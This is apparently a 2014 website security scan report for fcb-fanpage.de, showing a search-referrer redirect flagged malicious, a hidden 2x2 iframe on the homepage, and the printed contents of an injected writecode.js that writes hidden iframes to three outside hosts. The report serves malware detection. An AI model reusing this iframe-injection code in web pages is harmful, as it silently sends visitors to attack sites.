Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://fcb-fanpage.de/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: fcb-fanpage.de Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 24 May 2014 22:22:03 GMT Location: http://sagverket.se/whmd.html?h=1390286 Server: nginx Vary: Accept-Encoding Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://fcb-fanpage.de/ | 200 OK Content-Length: 1796 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?i=1390286 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?i=1390286> | ||
http://fcb-fanpage.de/writecode.js | 200 OK Content-Length: 545 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1390286></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1390286></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whmd.html?j=1390286></iframe>'); function writecode (htmlcode) { document.write(htmlcode); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whmd.html?j=1390286 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whmd.html?j=1390286> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1390286 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1390286> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=1390286 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1390286> | ||
http://fcb-fanpage.de/test404page.js | 404 Not Found Content-Length: 960 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fcb-fanpage.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fcb-fanpage.de/
Result: fcb-fanpage.de is not infected or malware details are not published yet.
Result: fcb-fanpage.de is not infected or malware details are not published yet.